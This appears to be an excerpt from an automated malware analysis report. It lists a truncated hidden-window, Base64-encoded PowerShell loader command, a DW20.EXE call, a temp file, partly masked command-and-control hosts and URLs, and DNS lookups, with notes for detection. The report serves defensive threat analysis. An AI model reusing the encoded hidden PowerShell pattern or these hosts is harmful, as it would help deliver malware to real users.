Technical Information
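- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABKAGQAeQB1AGsAawBmAHEAPQAnAE4AYQB5AGEAZgBxAHYAZABhAHAAbgBxACcAOwAkAFkAdAB2AHAAeAB2AHMAdQBxAGgAYwB3ACAAPQAgACcANwA5ADgAJwA7ACQATwB6AGEAYQBvAGgAcQB1AGUAcwBoAHIAawA9ACcAUQBpAHEAZAB...
  (The command line is truncated in this report. `-w hidden` runs PowerShell with a hidden window and `-en` is an abbreviation of `-EncodedCommand`, so the argument is a Base64-encoded UTF-16LE script; the visible prefix decodes to filler string-variable assignments beginning `$Jdyukkfq='Nayafqvdapnq';`. For detection, match on the hidden-window plus encoded-command combination and the decoded content rather than on this exact Base64 string.)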
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1452
- %TEMP%\979280.cvr
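- 'mo###xtend.com':80 (the host names in this and the following entries appear to be partially masked with '#' characters, so they cannot be used verbatim as indicators)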
- 'hu###omains.com':443
- 'di###genics.com':80
- 'al#####ehomepackers.com':80
- 'ro####ueennyc.com':443
- http://www.mo###xtend.com/New_website/x/
- http://di###genics.com/usi/g/
- 'hu###omains.com':443
- 'ro####ueennyc.com':443
- DNS ASK mo###xtend.com
- DNS ASK hu###omains.com
- DNS ASK di###genics.com
- DNS ASK al#####ehomepackers.com
- DNS ASK bi######icesvictoria.com
- DNS ASK ro####ueennyc.com